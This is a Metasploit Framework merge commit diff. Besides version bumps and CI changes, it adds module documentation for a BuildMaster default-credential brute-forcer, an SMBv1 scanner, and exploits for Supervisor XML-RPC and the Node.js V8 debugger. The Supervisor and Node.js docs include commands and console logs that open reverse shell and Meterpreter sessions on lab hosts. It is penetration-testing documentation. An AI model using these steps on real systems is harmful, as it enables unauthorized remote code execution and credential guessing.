Merge branch 'goliath' into loot_and_creds

Author: jbarnett-r7

.ruby-version

@@ -1 +1 @@
-2.4.1
+2.4.2

.travis.yml

@@ -12,18 +12,24 @@ addons:
 language: ruby
 rvm:
   - '2.2'
-  - '2.3.4'
-  - '2.4.1'
+  - '2.3.5'
+  - '2.4.2'
 
 env:
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
   - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
 
 matrix:
   fast_finish: true
+
+jobs:
+  # build docker image
   include:
-  - rvm: ruby-head
-    env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
+  - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true"
+    # we do not need any setup
+    before_install: skip
+    install: skip
+    before_script: skip
 before_install:
   - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
   - rake --version
@@ -42,7 +48,8 @@ before_script:
   - git diff --exit-code db/schema.rb
 script:
   - echo "${CMD}"
-  - bash -c "${CMD}"
+    # we need travis_wait because the Docker build job can take longer than 10 minutes
+  - if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
 
 notifications:
   irc: "irc.freenode.org#msfnotify"

Dockerfile

@@ -1,4 +1,4 @@
-FROM ruby:2.4.1-alpine
+FROM ruby:2.4.2-alpine
 MAINTAINER Rapid7
 
 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"

Gemfile

@@ -23,7 +23,6 @@ group :development do
   # module documentation
   gem 'octokit'
   # Metasploit::Aggregator external session proxy
-
   # Disabled for now for crypttlv updates
   # gem 'metasploit-aggregator'
 end

Gemfile.lock

@@ -17,7 +17,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.3.8)
+      metasploit-payloads (= 1.3.9)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.2.2)
       msgpack
@@ -152,7 +152,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.8)
+    metasploit-payloads (1.3.9)
     metasploit_data_models (2.0.15)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)

documentation/modules/auxiliary/scanner/http/buildmaster_login.md

@@ -0,0 +1,59 @@
+## Description
+
+This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
+The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
+
+## Vulnerable Application
+
+[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
+
+[Inedo website](http://inedo.com/)
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/buildmaster_login```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: Set credentials
+5. Do: ```run```
+6. You should see the module attempting to log in.
+
+## Scenarios
+
+### Attempt to login with the default credentials.
+
+```
+msf > use auxiliary/scanner/http/buildmaster_login
+msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
+RHOSTS => 10.0.0.39
+msf auxiliary(buildmaster_login) > run
+
+[+] 10.0.0.39:81          - Identified BuildMaster 5.7.3 (Build 1)
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"Admin"
+[+] SUCCESSFUL LOGIN - 10.0.0.39:81          - "Admin":"Admin"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(buildmaster_login) >
+```
+
+### Brute force with credentials from file.
+
+```
+msf > use auxiliary/scanner/http/buildmaster_login 
+msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
+RHOSTS => 10.0.0.39
+msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
+USERPASS_FILE => ~/BuildMasterCreds.txt
+msf auxiliary(buildmaster_login) > run
+
+[+] 10.0.0.39:81          - Identified BuildMaster 5.7.3 (Build 1)
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"test"
+[-] FAILED LOGIN - 10.0.0.39:81          - "Admin":"test"
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"wrong"
+[-] FAILED LOGIN - 10.0.0.39:81          - "Admin":"wrong"
+[*] 10.0.0.39:81          - Trying username:"Admin" with password:"Admin"
+[+] SUCCESSFUL LOGIN - 10.0.0.39:81          - "Admin":"Admin"
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(buildmaster_login) > 
+```

documentation/modules/auxiliary/scanner/smb/smb1.md

@@ -0,0 +1,55 @@
+# Description
+This module scans for hosts that support the SMBv1 protocol.  It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
+```PC NETWORK PROGRAM 1.0
+LANMAN1.0
+Windows for Workgroups 3.1a
+LM1.2X002
+LANMAN2.1
+NT LM 0.12
+```
+If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
+If the SMB server does not support SMBv1 a RST will be sent.
+
+___
+# Usage
+
+The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
+
+#### A host that does support SMBv1.
+
+```
+msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
+msf auxiliary(smb1) > set RHOSTS x.x.x.x
+RHOSTS => x.x.x.x
+msf auxiliary(smb1) > run
+
+[+] x.x.x.x:445        - x.x.x.x supports SMBv1 dialect.
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(smb1) > services -S x.x.x.x
+
+Services
+========
+
+host        port  proto  name  state  info
+----        ----  -----  ----  -----  ----
+x.x.x.x 445   tcp    smb1  open
+```
+
+#### A host that does not support SMBv1
+
+```
+msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
+msf auxiliary(smb1) > set RHOSTS y.y.y.y
+RHOSTS => y.y.y.y
+msf auxiliary(smb1) > run
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+___
+
+
+## Options
+
+The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation.  It can also be set using hosts from the database using ```hosts -R```.

documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md

@@ -0,0 +1,78 @@
+## Vulnerable Application
+
+  This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2
+  
+  This has been tested with versions 3.2.0 and 3.3.2
+
+### Creating A Testing Environment
+
+  At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
+
+  1. ```sudo apt-get install supervisor```
+  2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
+
+    ```
+    [inet_http_server]         ; inet (TCP) server disabled by default
+    port=:9001        ; ip_address:port specifier, *:port for all iface
+    username=user              ; default is no username (open server)
+    password=123               ; default is no password (open server)
+    ```
+
+  3. Restart the service: `sudo service supervisor restart`
+
+## Verification Steps
+
+  1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
+  2. ```set lhost [IP]```
+  3. ```set rhost [IP]```
+  4. ```set httpusername user```
+  5. ```set httppassword 123```
+  6. ```exploit```
+  7. A meterpreter session should have been opened successfully
+
+## Options
+
+  **HttpUsername**
+
+  Username for HTTP basic auth which is set in the conf file(optional)
+
+  **HttpPassword**
+
+  Password for HTTP basic auth which is set in the conf file(optional)
+
+  **TARGETURI**
+
+  The path to the XML-RPC endpoint
+
+## Scenarios
+
+### Supervisor 3.2.0 on Xubuntu 16.04
+
+```
+msf > use exploit/linux/http/supervisor_xmlrpc_exec 
+msf exploit(supervisor_xmlrpc_exec) > set httpusername user
+httpusername => user
+msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
+httppassword => 123
+msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
+lhost => 192.168.0.2
+msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
+rhost => 192.168.0.19
+msf exploit(supervisor_xmlrpc_exec) > check 
+
+[*] Extracting version from web interface..
+[*] Using basic auth (user:123)
+[+] Vulnerable version found: 3.2.0
+[*] 192.168.0.19:9001 The target appears to be vulnerable.
+msf exploit(supervisor_xmlrpc_exec) > exploit 
+
+[*] Started reverse TCP handler on 192.168.0.2:4444 
+[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
+[*] Using basic auth (user:123)
+[*] Sending stage (2878872 bytes) to 192.168.0.19
+[*] Command Stager progress - 100.00% done (782/782 bytes)
+[+] Request timeout, usually indicates success. Passing to handler..
+[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100
+
+meterpreter > 
+```

documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md

@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+Current and historical versions of node (or any JS env based on the 
+V8 JS engine) have this functionality and could be exploitable if
+configured to expose the JS port on an untrusted interface.
+
+Install a version of node using any of the normal methods: 
+* Vendor: https://nodejs.org/en/download/package-manager/
+* Distro: `sudo apt-get install nodejs` 
+
+Alternately, use standard node docker containers as targets:
+```
+$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858
+```
+(Others at https://hub.docker.com/_/node/)
+
+Tested on Node 7.x, 6.x, 4.x
+
+## Verification Steps
+
+1. Run a node process exposing the debug port
+```
+node --debug=0.0.0.0:5858 
+```
+
+2. Exploit it and catch the callback:
+
+```
+msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit
+```
+(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)
+
+Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity 
+(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.
+
+
+## Scenarios
+
+### Example Run (Node 7.x)
+
+Victim:
+```
+$ node --version
+v7.10.0
+$ node --debug=0.0.0.0:5858
+(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
+Debugger listening on 0.0.0.0:5858
+>
+(To exit, press ^C again or type .exit)
+```
+
+Attacker:
+```
+msf exploit(nodejs_v8_debugger) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.141:4444
+[*] 127.0.0.1:5858 - Sending 745 byte payload...
+[*] 127.0.0.1:5858 - Got success response
+[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
+
+id
+(redacted)
+``` 
+